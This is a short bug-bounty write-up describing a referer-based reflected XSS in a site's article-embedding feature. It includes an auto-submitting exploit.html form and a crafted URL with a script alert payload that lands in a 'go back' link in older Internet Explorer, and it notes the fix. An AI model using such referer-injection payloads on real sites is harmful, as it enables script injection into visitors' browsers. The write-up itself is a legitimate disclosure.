Referer Based XSS

Arbaz Hussain
Jul 30, 2017 · 2 min read

Severity : Medium

Complexity : High( Exploitable with old version of IE)

Weakness: Using Referer value is response body


  • While Testing one of the private on Hackerone . They have functionality to Embed the articles of their user’s on third party site’s.
  • While opening the article’s from third party site’s , Noticed that they have a href called “GO BACK! If it Doesn’t Load’s”
  • Checking the go back href :
<a href="http://54.147.92.2/test.html">go back</a>
and try again. If this problem persists, please
<a href="/contact">contact us</a>

  • Exploit.html
<script>document.getElementById(’xx’).submit()</script>
<form id=’xx’ name=’exploit’ method=”GET” action="https://site.com/articles/author/embed/112434/"></form>
  • When we sent http://54.147.92.2/exploit.html?<script>alert(1);</script> to the victim.
  • Referer value get’s set to http://54.147.92.2/exploit.html?<script>alert(1);</script> and by clicking on “GO BACK!” Popup will appear in IE.
  • Reason why attack work’s only on IE is Internet Explorer doesn’t filter URL Encode values . Whereas Chrome and Firefox will URL encode the values to
http://54.147.92.2/exploit.html?%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E


  • They have Fixed By using javascript:history.back() :

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store